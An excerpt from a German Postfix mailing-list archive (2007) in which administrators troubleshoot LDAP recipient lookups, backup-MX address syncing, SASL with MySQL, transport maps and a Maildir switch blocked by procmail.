<474D3E93.7040207@TMI-RZ.de> <20071129073659.GB10093@state-of-mind.de> Message-ID: <474E83A2.2050100@TMI-RZ.de> Patrick Ben Koetter schrieb: > * Thomas Stiefel : > >> Variante A: >> Ich könnte auf dem internen Domino-Server DOM1 im Intranet auch einen >> LDAP-Server aktivieren und diesen als 2. Ziel für den Lookup >> konfigurieren. Wobei sich hier die Frage stellt wie man das am besten >> konfiguriert. Die einfachste wäre wohl ein DNS-Alias, der auf beide >> Server zeigt und somit sollte Postfix dann hoffentlich automatisch auf >> DOM1 zugreifen, wenn DOM2 down ist. >> >> Variante B: >> Ich habe in einer Mail von Sandy gelesen, dass man wohl auch per Script >> das LDAP-Directory abfragen und das Ergebnis in eine Hash-DB schreiben >> kann. Es müsste hier allerdings neben der Internet-Adresse auch das Feld >> Kurzname aus dem Domino-Directory mit abgefragt werden. >> > > Ist das Feld "Kurzname" eine interne Anforderung oder leitet sie sich aus > einem Postfix requirement ab? > Das Feld "Kurzname" ist eine interne Anforderung, da hier zusätzliche Email-Adressen für einzelne User gepflegt werden können. Das sollte aber eigentlich keine Problem sein, es sich hier wohl um uid aus der Query handelt. > Variante B würde ich definitiv bevorzugen. So kommt auch keine Last auf das > Domino System wenn dictionary attacks auf die Postfix Server eingehen. > Genau, vor allem wegen der Last-Thematik wäre Variante B klar zu bevorzugen. Müsste man nur noch wissen wie das Script für die Abfrage aussehen muss ;-) Gruß Tom From Postfix at TMI-RZ.de Wed Nov 28 11:25:51 2007 From: Postfix at TMI-RZ.de (Thomas Stiefel) Date: Wed, 28 Nov 2007 11:25:51 +0100 Subject: [Postfixbuch-users] Gueltige Adressen auf Backup-MX - wie automatisieren? In-Reply-To: <000901c83112$ca0ef790$5e2ce6b0$@com> References: <000901c83112$ca0ef790$5e2ce6b0$@com> Message-ID: <474D422F.1040406@TMI-RZ.de> Andreas Pothe schrieb: > Servus, > > seit einiger Zeit betreibe ich einen eigenen Backup-MX. Über entsprechend > derzeit manuell geflegte Listen kennt dieser auch die gültigen > Empfängeradressen über Relay-Maps, sodass dieser MX auch nicht zu einem > Backscatter-Versender werden kann. > > Solange man sowas nur für eigene E-Mail-Adressen macht, wo sich zudem > äußerst selten mal eine Änderung ergibt, ist das ja auch praktikabel. Nun > soll der Server, der sich die meiste Zeit ja langweilt :-) auch für Freunde > als Backup-MX herhalten. Und da ist es eben nicht mehr praktikabel, für jede > Adressänderung sich auf eine Konsole zu begeben und manuell die Maps zu > pflegen. > > Irgendwelche Vorschläge, wie man sowas praktikabel löst, d. h. dass der > Backup-MX immer (bzw. mit nur geringer Verzögerung) die aktuell gültigen > Empfangsadressen kennt? > Ich hatte das Problem auch, da wir hier mehrer Postfix-Server mit gleicher Konfiguration betreiben. Daher habe ich irgendwann mal ein Shell-Script gebastelt, das von einem Master-Server, auf dem die Änderungen gepflegt werden, die geänderten Lookup-Tables per Rsync abholt, einen postmap ausführt und Postfix neu lädt. Das ganze funktioniert problemlos und ich kann das Script bei Interesse gerne zur Verfügung stellen. Gruß Tom From ml at awinkelmann.de Thu Nov 29 06:14:57 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 29 Nov 2007 06:14:57 +0100 Subject: [Postfixbuch-users] SASL mit auxprop und MySQL Backend In-Reply-To: <474DE60A.6030301@japantest.homelinux.com> References: <474DBD57.5000203@puersten.de> <474DE4D5.9010907@puersten.de> <474DE60A.6030301@japantest.homelinux.com> Message-ID: <200711290614.57725.ml@awinkelmann.de> On Mittwoch, 28. November 2007, Sandy Drobic wrote: > > Also was ich brauch, wenn ich die Abfrage richig verstehe, ist der > > komplette übergebene username. Im meinem Falls ist es so das username = > > emailadresse ist. Sprich die Tabelle sasl sieht wie folgt aus: > > > > mysql> select * from sasl; > > +---------------+----------+ > > > > | username | password | > > > > +---------------+----------+ > > > > | test1 at test.de | test | > > > > +---------------+----------+ > > Okay, dann passe die sql_select entsprechend an in smtpd.conf: > sql_select: SELECT password FROM sasl WHERE username = '%s' Es gibt kein %s. Der OP müsste das mit '%u@%r' lösen. -- Andreas From p at state-of-mind.de Thu Nov 29 11:50:14 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Thu, 29 Nov 2007 11:50:14 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <474E83A2.2050100@TMI-RZ.de> References: <474D3E93.7040207@TMI-RZ.de> <20071129073659.GB10093@state-of-mind.de> <474E83A2.2050100@TMI-RZ.de> Message-ID: <20071129105014.GD14023@state-of-mind.de> * Thomas Stiefel : > Das Feld "Kurzname" ist eine interne Anforderung, da hier zusätzliche > Email-Adressen für einzelne User gepflegt werden können. Das sollte aber > eigentlich keine Problem sein, es sich hier wohl um uid aus der Query > handelt. > > Variante B würde ich definitiv bevorzugen. So kommt auch keine Last auf das > > Domino System wenn dictionary attacks auf die Postfix Server eingehen. > > > Genau, vor allem wegen der Last-Thematik wäre Variante B klar zu > bevorzugen. Müsste man nur noch wissen wie das Script für die Abfrage > aussehen muss ;-) Kommt darauf an, wo Du die Daten dumpst. Auf der Domino-Kiste weis ich es nicht. Auf dem Postfix Server kannst Du einen lokalen OpenLDAP laufen lassen (Variante C...) und die Daten dort live abfragen oder mit ldapsearch dumpen und dann mit awk oder PERL extrahieren. p at rick -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From Postfix at TMI-RZ.de Thu Nov 29 07:41:12 2007 From: Postfix at TMI-RZ.de (Thomas Stiefel) Date: Thu, 29 Nov 2007 07:41:12 +0100 Subject: [Postfixbuch-users] Gueltige Adressen auf Backup-MX - wie automatisieren? In-Reply-To: <000901c83112$ca0ef790$5e2ce6b0$@com> References: <000901c83112$ca0ef790$5e2ce6b0$@com> Message-ID: <474E5F08.3040606@TMI-RZ.de> Andreas Pothe schrieb: > Servus, > > seit einiger Zeit betreibe ich einen eigenen Backup-MX. Über entsprechend > derzeit manuell geflegte Listen kennt dieser auch die gültigen > Empfängeradressen über Relay-Maps, sodass dieser MX auch nicht zu einem > Backscatter-Versender werden kann. > > Solange man sowas nur für eigene E-Mail-Adressen macht, wo sich zudem > äußerst selten mal eine Änderung ergibt, ist das ja auch praktikabel. Nun > soll der Server, der sich die meiste Zeit ja langweilt :-) auch für Freunde > als Backup-MX herhalten. Und da ist es eben nicht mehr praktikabel, für jede > Adressänderung sich auf eine Konsole zu begeben und manuell die Maps zu > pflegen. > > Irgendwelche Vorschläge, wie man sowas praktikabel löst, d. h. dassder > Backup-MX immer (bzw. mit nur geringer Verzögerung) die aktuell gültigen > Empfangsadressen kennt? > Ich hatte das Problem auch, da wir hier mehrer Postfix-Server mit gleicher Konfiguration betreiben. Daher habe ich irgendwann mal ein Shell-Script gebastelt, das von einem Master-Server, auf dem die Änderungen gepflegt werden, die geänderten Lookup-Tables per Rsync abholt, einen postmap ausführt und Postfix neu lädt. Das ganze funktioniert problemlos und ich kann das Script bei Interesse gerne zur Verfügung stellen. Gruß Tom From sven at root2.schroederhost.de Thu Nov 29 11:55:58 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Thu, 29 Nov 2007 11:55:58 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Procmail_und_virtuelle_Postf?= =?iso-8859-1?q?=E4cher?= In-Reply-To: <474DA03E.607@japantest.homelinux.com> References: <474D6DBF.2030201@root2.schroederhost.de> <474DA03E.607@japantest.homelinux.com> Message-ID: <474E9ABE.5040308@root2.schroederhost.de> Sandy Drobic schrieb: > Doch, aber du musst für diese Adresse eben den Transport procmail oder > local angeben, sonst wird der Standard-Transport für die Domainklasse > verwendet. > Mailbox_command wird nur von dem Transport local verwendet, der wiederum > nur für Domains in $mydestination per Default verwendet wird. > > es sind mehere V-Domains, wie macht man das dann? From ml at awinkelmann.de Thu Nov 29 06:51:35 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 29 Nov 2007 06:51:35 +0100 Subject: [Postfixbuch-users] Postfix Loadbalancing und Backup In-Reply-To: <474E4FDC.2030805@thoma.cc> References: <474E4FDC.2030805@thoma.cc> Message-ID: <200711290651.35668.ml@awinkelmann.de> On Donnerstag, 29. November 2007, Maximilian Thoma wrote: > ich habe vor mit 4 Servern ein "Loadbalancing/Backup" einzurichten. > > Ziel dabei soll sein die Last und die User auf diese 4 Server zu > verteilen. Dabei soll jeweils die anderen 3 den Backup für einen machen. > > Das verteilen der Last möchte ich per DNS realisieren das funktioniert > auch im LAB sehr gut. > > mxlb.example.de -> A 10.4.4.1, A 10.4.4.2, A 10.4.4.3, A 10.4.4.4 > mx01.example.de -> A 10.4.4.1 und jeweils dazu den PTR > mx02.example.de -> A 10.4.4.2 und jeweils dazu den PTR > mx03.example.de -> A 10.4.4.3 und jeweils dazu den PTR > mx04.example.de -> A 10.4.4.4 und jeweils dazu den PTR > > Bei einer Kundendomain wird dann mxlb.example.de als MX eingetragen. via > Round Robin werden dann die Mails auf die Server verteilt. > > Alle Userdaten sind in MySQL gespeichert. Jeder Host betreibt seinen > eigenen POP und IMAP server. per Perdition werden dann unter einer > Adresse (imap.example.de und pop3.example.de) zur Verfügung gestellt. Es > wird anhand einer mysql Tabelle entschieden wohin der Login (imap und > pop) "geroutet" wird. Das funktioniert ebenfalls super. Die MySQL > Tabellen werden via MySQL Replication auf allen Servern verteilt. > Die Domains für die der Server nicht zuständig ist sind in der > relay_domains drin und sollen dann an den entsprechenden Server > zugestellt werden. Was ist mit Überprüfung gültiger Empfänger? > Mein Problem ist folgendes: > > Beispiel: > > from:x at y.de to:user at example.org > > domain example.org liegt auf mx02.example.de > und wird von mx01.example.de angenommen. > > mx01.example.de kennt die domain example.org nicht ist aber in > relay_domains drin und der mx eintrag von der domain wird aufgelöst um > den relay host rauszufinden. wenn jetzt bei der auflösung durch das > round robin gerade mx01.example.de als zieladresse aufgelöst wird dann > bounced er die nachricht mit loop back to myself und stellt sie nicht > dem host mx02.example.de zu. > > meine idee war dann eine transport map zu schreiben allerdings blieb das > leider ohne erfolg. > > mysql> select * from transport; > +----+------------------+------------------------+ > > | id | domain | destination | > > +----+------------------+------------------------+ > > | 1 | example.org | smtp:mx02.example.de | > > +----+------------------+------------------------+ > 1 rows in set (0.00 sec) > > das ganze hängt dann per > transport_maps = mysql:/etc/postfix/mysql-v_transport.cf > drin. > > Der Test ob die Transport Map funktioniert war ebenfalls erfolgreich. > > root at mx02:/# postmap -q example.org mysql:/etc/postfix/mysql-v_transport.cf > smtp:mx02.example.de Der Host sollte in [] zurück gegeben werden. > Leider ignoriert er diese Map vollständig. Dann zeig doch mal wie sie eingebunden ist. # postconf -n > Was kann ich tun damit es funktioniert bzw. habt ihr eine bessere Idee ? -- Andreas From Andre.Huebner at gmx.de Thu Nov 29 12:35:59 2007 From: Andre.Huebner at gmx.de (=?iso-8859-1?Q?Andre_H=FCbner?=) Date: Thu, 29 Nov 2007 12:35:59 +0100 Subject: [Postfixbuch-users] postfix umschalten auf Maildir Message-ID: <003601c8327c$04a317f0$f91310ac@nmm.local> Hallo Liste, ich versuche aktuell zum testen und rumspielen postfix (unter suse 10.1) auf das maildir format umzustellen. Laut anleitung genügt ein relativer pfadname mit abschließendem Slash das an den Homeordner des angeschriebenen Users gehangen wird. ich hab in der main.cf home_mailbox = Maildir/ gesetzt. Da sich nichts änderte hab ich auch mail_spool_directory = Maildir/ gesetzt. Leider tut sich überhaupt nichts. Auch Einträge wie home_mailbox = ~/Maildir/ bewirken nichts. Mails landen nach wie vor in /var/spool/mail/ Auch postconf -d gibt die änderung an der main.cf nicht aus. Es ist aber die richtige main.cf. postfix habe ich auch durchgeladen bzw. restartet. Was kann es für gründe geben dass dies nicht akzeptiert wird? An der Stelle bin ich etwas ratlos. Postfix 2.3.4 Bin gespannt auf Eure Anregungen. Danke André From driessen at fblan.de Thu Nov 29 12:38:27 2007 From: driessen at fblan.de (Uwe Driessen) Date: Thu, 29 Nov 2007 12:38:27 +0100 Subject: [Postfixbuch-users] postfix umschalten auf Maildir In-Reply-To: <003601c8327c$04a317f0$f91310ac@nmm.local> References: <003601c8327c$04a317f0$f91310ac@nmm.local> Message-ID: <001001c8327c$5b73d330$0565a8c0@uwe> Andre Hübner schrieb: > Bin gespannt auf Eure Anregungen. Postconf -n Master.cf ohne Kommentare > > Danke André > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From Ralf.Hildebrandt at charite.de Thu Nov 29 12:38:31 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 29 Nov 2007 12:38:31 +0100 Subject: [Postfixbuch-users] postfix umschalten auf Maildir In-Reply-To: <003601c8327c$04a317f0$f91310ac@nmm.local> References: <003601c8327c$04a317f0$f91310ac@nmm.local> Message-ID: <20071129113831.GI31090@charite.de> * Andre Hübner : > Hallo Liste, > > ich versuche aktuell zum testen und rumspielen postfix (unter suse 10.1) auf > das maildir format umzustellen. Laut anleitung genügt ein relativer pfadname > mit abschließendem Slash das an den Homeordner des angeschriebenen Users > gehangen wird. > > ich hab in der main.cf > home_mailbox = Maildir/ > gesetzt. Da sich nichts änderte hab ich auch > mail_spool_directory = Maildir/ > gesetzt. > Leider tut sich überhaupt nichts. Auch Einträge wie > home_mailbox = ~/Maildir/ > bewirken nichts. Du hast noch immer procmail an. Steht aber auch im Log. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de The government is CLEARLY an out of control robot that has decided the greatest danger to America is Americans. From Rainer.Wiesenfarth at inpho.de Thu Nov 29 07:12:43 2007 From: Rainer.Wiesenfarth at inpho.de (Rainer Wiesenfarth) Date: Thu, 29 Nov 2007 07:12:43 +0100 Subject: [Postfixbuch-users] (OT) ERROR: Malformed database In-Reply-To: <474DBEE1.9070204@jkart.de> References: <474DBEE1.9070204@jkart.de> Message-ID: <474E585B.6030501@inpho.de> Jim Knuth schrieb: > ich bekomme sporadisch von Cron folgendes beim > Update von SaneSecurity: > > --snip > LibClamAV Error: Problem parsing database at line 1 > LibClamAV Error: Can't load /var/tmp/clamdb/scam.ndb: Malformed > database > ERROR: Malformed database > [...] > --snap > > Wenn ich dann auf die Console gehe und den Befehl händisch > "loslasse" ist aber alles in Ordnung. Hmm, wenn Konsole funktioniert, aber cron nicht dann kann es eigentlich nur an zwei Dingen liegen: - cron ruft das Kommando mit einer anderen uid auf und die Zugriffsrechte passen nicht oder - in der interaktiven Sitzung sieht das Environment anders aus, sodass ein anderes Kommando oder andere Daten verwendet werden Best Regards / Mit freundlichen Grüßen Rainer Wiesenfarth -- INPHO GmbH * Smaragdweg 1 * 70174 Stuttgart * Germany phone: +49 711 2288 10 * fax: +49 711 2288 111 * web: www.inpho.de place of business: Stuttgart * managing director: Johannes Saile commercial register: Stuttgart, HRB 9586 Leader in Photogrammetry and Digital Surface Modelling -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3277 bytes Beschreibung: S/MIME Cryptographic Signature URL : From Postfix at TMI-RZ.de Thu Nov 29 07:37:34 2007 From: Postfix at TMI-RZ.de (Thomas Stiefel) Date: Thu, 29 Nov 2007 07:37:34 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit Message-ID: <474E5E2E.1010804@TMI-RZ.de> Hallo zusammen, wir haben folgende Ausgangssituation: Wir betreiben 3 Postfix-Server als SMTP-Relays, die im Internet hängen und schon mal einiges an SPAM vorfiltern. Die Mails werden dann an einen Domino-Server DOM2 (ebenfalls in der DMZ) per SMTP weitergeleitet, auf dem weitere Checks laufen. Wir haben allerdings in der letzten Zeit das Problem, dass wir sehr viele Mails mit falschen Empfänger-Adressen bekommen, die das Domino-System unnötig belasten. Daher wollen wir per LDAP direkt eine Abfrage auf Benutzer im Domino-Directory ausführen und alle Mails abweisen, die nicht an eine gültige Adresse gehen. Ich habe auf dem DOM2 den LDAP-Server konfiguriert und gestartet sowie auf unserem Testsystem mittels relay_recipient_maps ein LDAP-Lookup eingerichtet, das auch wie gewünscht funktioniert. Das Problem ist nun allerdings, dass wir während des Offline-Backups des Domino-Servers temporäre Lookup-Fehler erhalten und die Mails dann temporär abgelehnt werden: 451 : Temporary lookup failure Da sich auf das Testsystem in der Regel nur ein paar wenige SPAM-Mails verirren ist das nicht ganz so tragisch, aber auf den Produktiv-Servern können wir das nicht gebrauchen. Daher bräuchten wir eine Lösung, damit auch in der Zeit wo der DOM2 down ist die Mails weiterhin angenommen und zugestellt werden. Nach einiger Recherche und reiflicher Überlegung bin ich auf 2 mögliche Szenarien gekommen. Variante A: Ich könnte auf dem internen Domino-Server DOM1 im Intranet auch einen LDAP-Server aktivieren und diesen als 2. Ziel für den Lookup konfigurieren. Wobei sich hier die Frage stellt wie man das am besten konfiguriert. Die einfachste wäre wohl ein DNS-Alias, der auf beide Server zeigt und somit sollte Postfix dann hoffentlich automatisch auf DOM1 zugreifen, wenn DOM2 down ist. Variante B: Ich habe in einer Mail von Sandy gelesen, dass man wohl auch per Script das LDAP-Directory abfragen und das Ergebnis in eine Hash-DB schreiben kann. Es müsste hier allerdings neben der Internet-Adresse auch das Feld Kurzname aus dem Domino-Directory mit abgefragt werden. Die LDAP-Query für Postfix lautet: query_filter = (|(mail=%s)(uid=%u)(uid=%s)) Die Variante B würde ich ganz klar bevorzugen, da ich hier nicht nur keinen 2. LDAP-Server laufen lassen müsste und den Zugriff aus der DMZ ins Intranet nicht erlauben müsste, sondern vor allem auch die Anzahl der LDAP-Abfragen minimieren könnte - was den Domino-Server zusätzlich entlasten würde. Ich wäre für jeden vernünftigen Vorschlag sehr dankbar. Gruß Tom From Ralf.Hildebrandt at charite.de Thu Nov 29 13:11:31 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 29 Nov 2007 13:11:31 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <474E5E2E.1010804@TMI-RZ.de> References: <474E5E2E.1010804@TMI-RZ.de> Message-ID: <20071129121131.GJ31090@charite.de> * Thomas Stiefel : > Das Problem ist nun allerdings, dass wir während des Offline-Backups des > Domino-Servers temporäre Lookup-Fehler erhalten und die Mails dann > temporär abgelehnt werden: > > 451 : Temporary lookup failure Ist ja kein echtes Problem. Die Mails werden ja nochmal zugestellt. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de C:\> WIN Bad command or filename C:\> LOSE Loading Microsoft Windows ... From Ralf.Hildebrandt at charite.de Thu Nov 29 13:12:00 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 29 Nov 2007 13:12:00 +0100 Subject: [Postfixbuch-users] LDAP-Lookup und Ausfallsicherheit In-Reply-To: <474E5E2E.1010804@TMI-RZ.de> References: <474E5E2E.1010804@TMI-RZ.de> Message-ID: <20071129121200.GK31090@charite.de> * Thomas Stiefel : > Variante B: > Ich habe in einer Mail von Sandy gelesen, dass man wohl auch per Script > das LDAP-Directory abfragen und das Ergebnis in eine Hash-DB schreiben > kann. Es müsste hier allerdings neben der Internet-Adresse auch das Feld > Kurzname aus dem Domino-Directory mit abgefragt werden. > > Die LDAP-Query für Postfix lautet: query_filter = > (|(mail=%s)(uid=%u)(uid=%s)) > > Die Variante B würde ich ganz klar bevorzugen, da ich hier nicht nur > keinen 2. LDAP-Server laufen lassen müsste und den Zugriff aus der DMZ > ins Intranet nicht erlauben müsste, sondern vor allem auch die Anzahl > der LDAP-Abfragen minimieren könnte - was den Domino-Server zusätzlich > entlasten würde. Würde ich auch vorziehen -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de Arguing with good advice will result in lack of good advice. -- Victor Duchovni From Andre.Huebner at gmx.de Thu Nov 29 13:18:10 2007 From: Andre.Huebner at gmx.de (=?iso-8859-1?Q?Andre_H=FCbner?=) Date: Thu, 29 Nov 2007 13:18:10 +0100 Subject: [Postfixbuch-users] postfix umschalten auf Maildir References: <003601c8327c$04a317f0$f91310ac@nmm.local> <20071129113831.GI31090@charite.de> Message-ID: <006701c83281$e8696390$f91310ac@nmm.local> Hallo, procmail war das Zauberwort. Klar, ist ja auch logisch... sorry Ich hab weiter gegoggelt und diese Zeile gefunden: ----- Original Message ----- From: "Ralf Hildebrandt" To: Sent: Thursday, November 29, 2007 12:38 PM Subject: Re: [Postfixbuch-users] postfix umschalten auf Maildir * Andre Hübner : > Hallo Liste, > > ich versuche aktuell zum testen und rumspielen postfix (unter suse 10.1) > auf > das maildir format umzustellen. Laut anleitung genügt ein relativer > pfadname > mit abschließendem Slash das an den Homeordner des angeschriebenen Users > gehangen wird. > > ich hab in der main.cf > home_mailbox = Maildir/ > gesetzt. Da sich nichts änderte hab ich auch > mail_spool_directory = Maildir/ > gesetzt. > Leider tut sich überhaupt nichts. Auch Einträge wie > home_mailbox = ~/Maildir/ > bewirken nichts. Du hast noch immer procmail an. Steht aber auch im Log. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de The government is CLEARLY an out of control robot that has decided the greatest danger to America is Americans. -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From Andre.Huebner at gmx.de Thu Nov 29 13:19:38 2007 From: Andre.Huebner at gmx.de (=?iso-8859-1?Q?Andre_H=FCbner?=) Date: Thu, 29 Nov 2007 13:19:38 +0100 Subject: [Postfixbuch-users] postfix umschalten auf Maildir References: <003601c8327c$04a317f0$f91310ac@nmm.local> <20071129113831.GI31090@charite.de> Message-ID: <007401c83282$1cd864a0$f91310ac@nmm.local> Hallo, procmail war das Zauberwort. Klar, ist ja auch logisch... sorry Ich hab weiter gegoggelt und diese Zeile gefunden: mailbox_command = /usr/bin/procmail -a "$EXTENSION" DEFAULT=$HOME/Maildir/ MAILDIR=$HOME/Maildir Damit funktioniert es. Das ich die Wert mit postconf -d statt mit -n abgefragt hab war natürlich Dummheit ;) Danke Andre ----- Original Message ----- From: "Ralf Hildebrandt" To: Sent: Thursday, November 29, 2007 12:38 PM Subject: Re: [Postfixbuch-users] postfix umschalten auf Maildir * Andre Hübner : > Hallo Liste, > > ich versuche aktuell zum testen und rumspielen postfix (unter suse 10.1) > auf > das maildir format umzustellen. Laut anleitung genügt ein relativer > pfadname > mit abschließendem Slash das an den Homeordner des angeschriebenen Users > gehangen wird. > > ich hab in der main.cf > home_mailbox = Maildir/ > gesetzt. Da sich nichts änderte hab ich auch > mail_spool_directory = Maildir/ > gesetzt. > Leider tut sich überhaupt nichts. Auch Einträge wie > home_mailbox = ~/Maildir/ > bewirken nichts. Du hast noch immer procmail an. Steht aber auch im Log. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de The government is CLEARLY an out of control robot that has decided the greatest danger to America is Americans. -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From peter.bauernfeind at reba-eno.de Thu Nov 29 13:26:59 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Thu, 29 Nov 2007 13:26:59 +0100 Subject: [Postfixbuch-users] postfix umschalten auf Maildir In-Reply-To: <007401c83282$1cd864a0$f91310ac@nmm.local> References: <003601c8327c$04a317f0$f91310ac@nmm.local> <20071129113831.GI31090@charite.de> <007401c83282$1cd864a0$f91310ac@nmm.local> Message-ID: <474EB013.20102@reba-eno.de> Andre Hübner schrieb: > mailbox_command = /usr/bin/procmail -a "$EXTENSION" DEFAULT=$HOME/Maildir/ > MAILDIR=$HOME/Maildir > > Bei mir funktioniert das so: home_mailbox = maildir/ #mailbox_command = procmail -a "$EXTENSION" Hier bei mir hat es gereicht procmail auszukommentieren. Mit freundlichem Gruß Peter Bauernfeind From Andre.Huebner at gmx.de Thu Nov 29 13:31:27 2007 From: Andre.Huebner at gmx.de (=?iso-8859-1?Q?Andre_H=FCbner?=) Date: Thu, 29 Nov 2007 13:31:27 +0100 Subject: [Postfixbuch-users] postfix umschalten auf Maildir References: <003601c8327c$04a317f0$f91310ac@nmm.local> <20071129113831.GI31090@charite.de><007401c83282$1cd864a0$f91310ac@nmm.local> <474EB013.20102@reba-eno.de> Message-ID: <009f01c83283$c364b200$f91310ac@nmm.local> Hallo, genügt bei mir leider nicht. Ich bin auf procmail angewiesen um weitere Mailfilterungen etc. durchzuführen. Bin aktuell noch am testen ob das noch so funktioniert wie es soll, aber ich hab ein gutes Gefühl ;) André ----- Original Message ----- From: "Peter Bauernfeind" To: "Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein." Sent: Thursday, November 29, 2007 1:26 PM Subject: Re: [Postfixbuch-users] postfix umschalten auf Maildir Andre Hübner schrieb: > mailbox_command = /usr/bin/procmail -a "$EXTENSION" DEFAULT=$HOME/Maildir/ > MAILDIR=$HOME/Maildir > > Bei mir funktioniert das so: home_mailbox = maildir/ #mailbox_command = procmail -a "$EXTENSION" Hier bei mir hat es gereicht procmail auszukommentieren. Mit freundlichem Gruß Peter Bauernfeind -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From cscholz at 2nibbles4u.de Thu Nov 29 13:42:59 2007 From: cscholz at 2nibbles4u.de (Christian Scholz) Date: Thu, 29 Nov 2007 13:42:59 +0100 Subject: [Postfixbuch-users] Filesystem state: "not clean" Message-ID: <63908DA348933441A6FB2AB998ED894F0196E2@dcex01.2nibbles4u.local> Muss ich mir da jetzt Gedanken machen? Das System läuft jetzt seit der Installation durch. Nie Probleme festgestellt... bash ~ # tune2fs -l /dev/md0 tune2fs 1.40-WIP (14-Nov-2006) Filesystem volume name: boot Last mounted on: ... Filesystem state: not clean ^^^^^^ Errors behavior: Continue Filesystem OS type: Linux ... Last mount time: Sat Jul 21 23:51:42 2007 Last write time: Fri Aug 17 10:06:25 2007 Mount count: 2 Maximum mount count: 30 Last checked: Sat Jul 21 17:32:34 2007 ... Gruß Christian Scholz From jk at jkart.de Thu Nov 29 13:47:54 2007 From: jk at jkart.de (Jim Knuth) Date: Thu, 29 Nov 2007 13:47:54 +0100 Subject: [Postfixbuch-users] (OT) ERROR: Malformed database In-Reply-To: <474E585B.6030501@inpho.de> References: <474DBEE1.9070204@jkart.de> <474E585B.6030501@inpho.de> Message-ID: <474EB4FA.60804@jkart.de> Am 29.11.2007 7:12 Uhr, schrieb Rainer Wiesenfarth: > Jim Knuth schrieb: >> ich bekomme sporadisch von Cron folgendes beim >> Update von SaneSecurity: >> >> --snip >> LibClamAV Error: Problem parsing database at line 1 >> LibClamAV Error: Can't load /var/tmp/clamdb/scam.ndb: Malformed database >> ERROR: Malformed database >> [...] >> --snap >> >> Wenn ich dann auf die Console gehe und den Befehl händisch "loslasse" >> ist aber alles in Ordnung. > > Hmm, wenn Konsole funktioniert, aber cron nicht dann kann es eigentlich > nur an zwei Dingen liegen: > - cron ruft das Kommando mit einer anderen uid auf und die > Zugriffsrechte passen nicht oder > - in der interaktiven Sitzung sieht das Environment anders aus, sodass > ein anderes Kommando oder andere Daten verwendet werden > > Best Regards / Mit freundlichen Grüßen > Rainer Wiesenfarth > ok. Aber es kommt ja NUR sporadisch. Manchmal 1x am Tag, manchmal 3x, und manchmal gar nicht. -- mit freundlichem Gruss - with kind regard Jim Knuth #ICQ 277289867 From nighthawk at gmail.com Thu Nov 29 14:02:35 2007 From: nighthawk at gmail.com (nighthawk) Date: Thu, 29 Nov 2007 14:02:35 +0100 Subject: [Postfixbuch-users] Filesystem state: "not clean" In-Reply-To: <63908DA348933441A6FB2AB998ED894F0196E2@dcex01.2nibbles4u.local> References: <63908DA348933441A6FB2AB998ED894F0196E2@dcex01.2nibbles4u.local> Message-ID: <7832fd560711290502v2dcd8edev28898ffdd2c361f3@mail.gmail.com> On Nov 29, 2007 1:42 PM, Christian Scholz wrote: > Muss ich mir da jetzt Gedanken machen? > Das System läuft jetzt seit der Installation durch. Nie Probleme festgestellt... > > [...] > Filesystem state: not clean > ^^^^^^ > [...] Ist das Dateisystem gemounted? From peter.bauernfeind at reba-eno.de Thu Nov 29 14:02:53 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Thu, 29 Nov 2007 14:02:53 +0100 Subject: [Postfixbuch-users] Filesystem state: "not clean" In-Reply-To: <63908DA348933441A6FB2AB998ED894F0196E2@dcex01.2nibbles4u.local> References: <63908DA348933441A6FB2AB998ED894F0196E2@dcex01.2nibbles4u.local> Message-ID: <474EB87D.5070805@reba-eno.de> Christian Scholz schrieb: > Muss ich mir da jetzt Gedanken machen? > Das System läuft jetzt seit der Installation durch. Nie Probleme festgestellt... > > bash ~ # tune2fs -l /dev/md0 > tune2fs 1.40-WIP (14-Nov-2006) > Filesystem volume name: boot > Last mounted on: > ... > Filesystem state: not clean > ^^^^^^ > Hmmm, heißt das nicht, daß die 